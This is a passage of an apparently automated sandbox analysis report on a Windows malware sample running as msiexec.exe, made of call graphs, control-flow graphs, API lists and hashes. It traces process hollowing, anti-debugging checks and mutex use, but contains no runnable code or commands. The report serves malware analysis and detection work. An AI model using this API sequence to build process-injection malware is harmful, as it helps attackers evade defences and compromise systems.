1408 7ff6345c2715 CloseHandle 1406->1408 1409 7ff6345c2775 CloseHandle GetThreadContext 1407->1409 1410 7ff6345c2752 VirtualFree CloseHandle 1407->1410 1408->1398 1411 7ff6345c27c5 VirtualFree 1409->1411 1412 7ff6345c27dd ReadProcessMemory GetModuleHandleA GetProcAddress 1409->1412 1410->1398 1411->1398 1413 7ff6345c2860 1412->1413 1414 7ff6345c2864 VirtualFree 1413->1414 1415 7ff6345c287c VirtualAllocEx 1413->1415 1414->1398 1416 7ff6345c28ff WriteProcessMemory 1415->1416 1417 7ff6345c28e7 VirtualFree 1415->1417 1418 7ff6345c2935 VirtualFree 1416->1418 1422 7ff6345c294d 1416->1422 1417->1398 1418->1398 1419 7ff6345c2983 WriteProcessMemory 1421 7ff6345c2a0e VirtualFree 1419->1421 1419->1422 1420 7ff6345c2a2b 1423 7ff6345c2a9d RtlCompareMemory 1420->1423 1424 7ff6345c2d1c WriteProcessMemory SetThreadContext 1420->1424 1421->1398 1422->1419 1422->1420 1423->1420 1430 7ff6345c2af0 1423->1430 1425 7ff6345c2da2 VirtualFree 1424->1425 1426 7ff6345c2db7 ResumeThread 1424->1426 1425->1398 1427 7ff6345c2dde VirtualFree 1426->1427 1428 7ff6345c2dc9 VirtualFree 1426->1428 1427->1398 1428->1398 1429 7ff6345c2d17 1429->1424 1430->1429 1431 7ff6345c2c20 ReadProcessMemory WriteProcessMemory 1430->1431 1431->1430 1432 7ff6345c2cf5 VirtualFree 1431->1432 1432->1398 1433->1399 1434->1399 1435->1399 1436 7ff6345c317c 1437 7ff6345c3185 1436->1437 1438 7ff6345c319e 1437->1438 1441 7ff6345c2ffc 1437->1441 1446 7ff6345c2dfc CreateMutexA 1441->1446 1444 7ff6345c3017 Sleep CreateThread WaitForSingleObject 1445 7ff6345c305c Sleep 1444->1445 1445->1437 1447 7ff6345c2e45 GetLastError 1446->1447 1448 7ff6345c2e28 ReleaseMutex CloseHandle 1446->1448 1449 7ff6345c2e6f ReleaseMutex CloseHandle 1447->1449 1450 7ff6345c2e52 ReleaseMutex CloseHandle 1447->1450 1451 7ff6345c2e87 1448->1451 1449->1451 1450->1451 1451->1444 1451->1445 1474 7ff6345c306c 1479 7ff6345c3075 1474->1479 1475 7ff6345c3161 1477 7ff6345c3be4 RegDeleteKeyW 1477->1479 1478 7ff6345c3de4 9 API calls 1478->1479 1479->1475 1479->1477 1479->1478 1480 7ff6345c3151 Sleep 1479->1480 1481 7ff6345c4404 1479->1481 1480->1479 1482 7ff6345c4452 1481->1482 1483 7ff6345c449a 1482->1483 1487 7ff6345c4384 SetFilePointer WriteFile SetEndOfFile 1482->1487 1483->1479 1485 7ff6345c447b CloseHandle 1485->1483 1487->1485 1488 7ff6345c333c 1489 7ff6345c24cc 35 API calls 1488->1489 1490 7ff6345c334c 1489->1490

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF6345CE7A5 1 Function_00007FF6345C3CA4 2 Function_00007FF6345C40A4 79 Function_00007FF6345C3B14 2->79 90 Function_00007FF6345C3AE4 2->90 3 Function_00007FF6345CF1A1 4 Function_00007FF6345CCE9D 5 Function_00007FF6345CE796 6 Function_00007FF6345C2E9C 7 Function_00007FF6345C329C 20 Function_00007FF6345C4084 7->20 21 Function_00007FF6345C3884 7->21 62 Function_00007FF6345C3C24 7->62 63 Function_00007FF6345C4524 7->63 94 Function_00007FF6345C10D8 7->94 8 Function_00007FF6345C339C 9 Function_00007FF6345C149C 10 Function_00007FF6345CE9B3 11 Function_00007FF6345CFAB3 12 Function_00007FF6345CDEB4 13 Function_00007FF6345C44B4 14 Function_00007FF6345D00AA 15 Function_00007FF6345C36AC 16 Function_00007FF6345C31AC 17 Function_00007FF6345CE9A9 18 Function_00007FF6345C147F 19 Function_00007FF6345C4384 103 Function_00007FF6345C3FC4 20->103 69 Function_00007FF6345C3704 21->69 22 Function_00007FF6345CB180 23 Function_00007FF6345CF67D 24 Function_00007FF6345CB776 25 Function_00007FF6345CB277 26 Function_00007FF6345C337C 112 Function_00007FF6345C24CC 26->112 27 Function_00007FF6345C317C 73 Function_00007FF6345C2FFC 27->73 28 Function_00007FF6345CB778 29 Function_00007FF6345C1088 30 Function_00007FF6345C248C 31 Function_00007FF6345C2160 32 Function_00007FF6345CE465 33 Function_00007FF6345CB061 34 Function_00007FF6345CB05A 35 Function_00007FF6345C335C 35->112 36 Function_00007FF6345CEB58 37 Function_00007FF6345CFD58 38 Function_00007FF6345CB772 39 Function_00007FF6345CC874 40 Function_00007FF6345C3974 41 Function_00007FF6345CE46C 42 Function_00007FF6345CFA6D 43 Function_00007FF6345C306C 43->40 48 Function_00007FF6345C3B44 43->48 70 Function_00007FF6345C4404 43->70 91 Function_00007FF6345C3BE4 43->91 92 Function_00007FF6345C3DE4 43->92 44 Function_00007FF6345CF443 45 Function_00007FF6345CDB44 46 Function_00007FF6345C1444 47 Function_00007FF6345C4244 47->79 49 Function_00007FF6345D0340 50 Function_00007FF6345C153C 50->9 98 Function_00007FF6345C14EC 50->98 51 Function_00007FF6345C333C 51->112 52 Function_00007FF6345CC038 53 Function_00007FF6345CB052 54 Function_00007FF6345CE454 55 Function_00007FF6345CE155 56 Function_00007FF6345CB04E 57 Function_00007FF6345CC14F 58 Function_00007FF6345CB250 59 Function_00007FF6345CE151 60 Function_00007FF6345C354D 61 Function_00007FF6345C244C 63->13 64 Function_00007FF6345C3A34 64->21 64->40 64->69 65 Function_00007FF6345CE12F 66 Function_00007FF6345C2F2C 66->20 66->21 66->62 66->63 66->94 67 Function_00007FF6345CE129 68 Function_00007FF6345C1000 111 Function_00007FF6345C36D4 69->111 70->19 71 Function_00007FF6345CBBFB 72 Function_00007FF6345C2DFC 73->72 74 Function_00007FF6345CBBF7 75 Function_00007FF6345CC4F8 76 Function_00007FF6345CBBF9 77 Function_00007FF6345CE812 78 Function_00007FF6345CFD12 80 Function_00007FF6345CEA11 81 Function_00007FF6345CD70A 82 Function_00007FF6345C340C 82->1 82->2 82->7 82->8 82->16 82->50 82->64 83 Function_00007FF6345C320C 82->83 89 Function_00007FF6345C41E4 82->89 110 Function_00007FF6345C3ED4 82->110 83->21 95 Function_00007FF6345C42F4 83->95 84 Function_00007FF6345C240C 85 Function_00007FF6345CE408 86 Function_00007FF6345CD2E2 87 Function_00007FF6345CC2E4 88 Function_00007FF6345CD2E5 93 Function_00007FF6345CCCE1 94->46 94->68 104 Function_00007FF6345C13C4 94->104 95->47 96 Function_00007FF6345D02F0 97 Function_00007FF6345CF4EB 99 Function_00007FF6345CD2E7 100 Function_00007FF6345CF4E7 101 Function_00007FF6345CD2E9 102 Function_00007FF6345CF4E9 105 Function_00007FF6345C35B9 106 Function_00007FF6345CD7BB 107 Function_00007FF6345C36BC 108 Function_00007FF6345CBFB8 109 Function_00007FF6345CB0D5 112->30 112->61 112->84 113 Function_00007FF6345CB2C8

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF6345C340C Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff6345c340c-7ff6345c3422 call 7ff6345c153c call 7ff6345c31ac 236 7ff6345c3424-7ff6345c3426 ExitProcess 231->236 237 7ff6345c342c-7ff6345c345a call 7ff6345c40a4 call 7ff6345c3ca4 call 7ff6345c3ed4 231->237 244 7ff6345c345c-7ff6345c346d call 7ff6345c41e4 237->244 245 7ff6345c34ab-7ff6345c34be call 7ff6345c3ed4 237->245 252 7ff6345c346f-7ff6345c3480 call 7ff6345c41e4 244->252 253 7ff6345c3482-7ff6345c3484 ExitProcess 244->253 250 7ff6345c34c0-7ff6345c34d1 call 7ff6345c41e4 245->250 251 7ff6345c34fc-7ff6345c350f call 7ff6345c3ed4 245->251 260 7ff6345c34d3-7ff6345c34d5 ExitProcess 250->260 261 7ff6345c34db call 7ff6345c320c 250->261 263 7ff6345c3511-7ff6345c3522 call 7ff6345c41e4 251->263 264 7ff6345c3552-7ff6345c3568 call 7ff6345c3a34 call 7ff6345c339c 251->264 252->253 262 7ff6345c348a call 7ff6345c329c 252->262 270 7ff6345c34e0-7ff6345c34e5 261->270 272 7ff6345c348f-7ff6345c3494 262->272 273 7ff6345c3524-7ff6345c3526 ExitProcess 263->273 274 7ff6345c352c call 7ff6345c320c 263->274 283 7ff6345c35be-7ff6345c3696 CreateThread * 3 WaitForMultipleObjects ExitProcess 264->283 284 7ff6345c356a-7ff6345c357b call 7ff6345c41e4 264->284 275 7ff6345c34f4-7ff6345c34f6 ExitProcess 270->275 276 7ff6345c34e7-7ff6345c34f2 Sleep 270->276 278 7ff6345c34a3-7ff6345c34a5 ExitProcess 272->278 279 7ff6345c3496-7ff6345c34a1 Sleep 272->279 282 7ff6345c3531-7ff6345c3536 274->282 276->270 279->272 285 7ff6345c3545-7ff6345c3547 ExitProcess 282->285 286 7ff6345c3538-7ff6345c3543 Sleep 282->286 289 7ff6345c3590-7ff6345c3592 ExitProcess 284->289 290 7ff6345c357d-7ff6345c358e call 7ff6345c41e4 284->290 286->282 290->289 293 7ff6345c3598 call 7ff6345c329c 290->293 295 7ff6345c359d-7ff6345c35a2 293->295 296 7ff6345c35b1-7ff6345c35b3 ExitProcess 295->296 297 7ff6345c35a4-7ff6345c35af Sleep 295->297 297->295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 3b3baf5108ba4d6c55c5e6195d542c51ff070c541550624ec8c12d19a85c9b75
                                                                                                                                                                                                                        • Instruction ID: bea52b7f392638b7029a2faf43c1bd6b90ff67db4c2600eeba34f16ef956517b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b3baf5108ba4d6c55c5e6195d542c51ff070c541550624ec8c12d19a85c9b75
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1611C31E18A5785FBA4AB31E8D937AA2A0BF95721F400035D44EC67E5DE3DED09E740
                                                                                                                                                                                                                        Function 00007FF6345C40A4 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: f8f06d7332d2cd3c7cd09d45edadc0ec34b01fab07090b076a6d0cb3d522b8fd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03311632E18A8186E750CB15E89072AF7A0FBD57A1F101036FA8EC3B68DF7CD8419B00
                                                                                                                                                                                                                        Function 00007FF6345C31AC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: 9f96a70d51e68ef5a4a6ac1ad8d13b2d8639f8f6deffb1d443e58f6487f72e0f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BEF08224D0C28689F7305B25A8C4339A7A0BB59B19F042175D58DC6394CF6CDD09EB11
                                                                                                                                                                                                                        Function 00007FF6345C41E4 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction ID: 49256e90dbfe77bd90bd24b74a59dec01f40a2318b881c4b947f7d95c76af5ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36F0C925D0CA4292EA605B60B88677EA3A0FB96722F502535D98FC2B94CF3DD949B600
                                                                                                                                                                                                                        Function 00007FF6345C14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 328 7ff6345c14ec-7ff6345c1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6345C15F1,?,?,?,?,?,?,?,?,00007FF6345C3418), ref: 00007FF6345C14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6345C15F1,?,?,?,?,?,?,?,?,00007FF6345C3418), ref: 00007FF6345C1514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 4da21d887ff8d6e8b8771bc7d72289236bcb5d7175318c26796d5f7f39b8fde2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E09276909F80C6C6209B15F88001AB7B4FBC8795F504125EACD82B28CF3CC565CB00
                                                                                                                                                                                                                        Function 00007FF6345C3AE4 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 329 7ff6345c3ae4-7ff6345c3af3 330 7ff6345c3af5-7ff6345c3b02 VirtualFree 329->330 331 7ff6345c3b08-7ff6345c3b0c 329->331 330->331
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: 23ab914d4e648fe5b3ecd6ad18fdcab4b38fe1dad24f6acadf6a6bf89553e67f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DD01221E38D4181E7949B26E8C9719A7A0FBC4744F808035E689C1664CF3CC599CF00

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF6345C24CC Relevance: 63.4, APIs: 32, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 332 7ff6345c24cc-7ff6345c2546 GetModuleFileNameW 333 7ff6345c2548 332->333 334 7ff6345c254d-7ff6345c2589 332->334 335 7ff6345c2df1-7ff6345c2df9 333->335 336 7ff6345c25a1-7ff6345c25bd call 7ff6345c240c 334->336 337 7ff6345c258b-7ff6345c2593 334->337 345 7ff6345c2600-7ff6345c260a 336->345 338 7ff6345c25bf-7ff6345c25db call 7ff6345c244c 337->338 339 7ff6345c2595-7ff6345c259d 337->339 338->345 342 7ff6345c259f-7ff6345c25fb 339->342 343 7ff6345c25dd-7ff6345c25f9 call 7ff6345c248c 339->343 342->335 343->345 350 7ff6345c2611-7ff6345c2665 CreateProcessW 345->350 351 7ff6345c260c 345->351 352 7ff6345c2667 350->352 353 7ff6345c266c-7ff6345c26ac 350->353 351->335 352->335 355 7ff6345c26ae 353->355 356 7ff6345c26b3-7ff6345c26cf GetFileSize 353->356 355->335 357 7ff6345c26d1-7ff6345c26d9 356->357 358 7ff6345c26db-7ff6345c26e6 CloseHandle 356->358 357->358 359 7ff6345c26eb-7ff6345c2713 VirtualAlloc 357->359 358->335 360 7ff6345c2725-7ff6345c2750 ReadFile 359->360 361 7ff6345c2715-7ff6345c2720 CloseHandle 359->361 362 7ff6345c2775-7ff6345c27c3 CloseHandle GetThreadContext 360->362 363 7ff6345c2752-7ff6345c2770 VirtualFree CloseHandle 360->363 361->335 364 7ff6345c27c5-7ff6345c27d8 VirtualFree 362->364 365 7ff6345c27dd-7ff6345c2862 ReadProcessMemory GetModuleHandleA GetProcAddress 362->365 363->335 364->335 367 7ff6345c2864-7ff6345c2877 VirtualFree 365->367 368 7ff6345c287c-7ff6345c28e5 VirtualAllocEx 365->368 367->335 369 7ff6345c28ff-7ff6345c2933 WriteProcessMemory 368->369 370 7ff6345c28e7-7ff6345c28fa VirtualFree 368->370 371 7ff6345c2935-7ff6345c2948 VirtualFree 369->371 372 7ff6345c294d-7ff6345c2958 369->372 370->335 371->335 373 7ff6345c296a-7ff6345c297d 372->373 374 7ff6345c2983-7ff6345c2a0c WriteProcessMemory 373->374 375 7ff6345c2a2b-7ff6345c2a72 373->375 376 7ff6345c2a0e-7ff6345c2a21 VirtualFree 374->376 377 7ff6345c2a26 374->377 378 7ff6345c2a84-7ff6345c2a97 375->378 376->335 377->373 380 7ff6345c2a9d-7ff6345c2aec RtlCompareMemory 378->380 381 7ff6345c2d1c-7ff6345c2da0 WriteProcessMemory SetThreadContext 378->381 382 7ff6345c2af0-7ff6345c2b19 380->382 383 7ff6345c2aee 380->383 384 7ff6345c2da2-7ff6345c2db5 VirtualFree 381->384 385 7ff6345c2db7-7ff6345c2dc7 ResumeThread 381->385 387 7ff6345c2b24-7ff6345c2b32 382->387 383->378 384->335 388 7ff6345c2dde-7ff6345c2deb VirtualFree 385->388 389 7ff6345c2dc9-7ff6345c2ddc VirtualFree 385->389 390 7ff6345c2b38-7ff6345c2bc3 387->390 391 7ff6345c2d17 387->391 388->335 389->335 392 7ff6345c2bd5-7ff6345c2be3 390->392 391->381 393 7ff6345c2d12 392->393 394 7ff6345c2be9-7ff6345c2c1c 392->394 393->387 395 7ff6345c2c20-7ff6345c2cf3 ReadProcessMemory WriteProcessMemory 394->395 396 7ff6345c2c1e 394->396 398 7ff6345c2cf5-7ff6345c2d08 VirtualFree 395->398 399 7ff6345c2d0d 395->399 396->392 398->335 399->393
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: 845cd457b4a6a3a9a5f962453a915287d9d320726e537a5dbb2b8a305b093601
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB32D936E0CAC586E774CB15E8947AAB7A1FB88B55F004135EA8DC3B68DF7CD8459B00
                                                                                                                                                                                                                        Function 00007FF6345C10D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
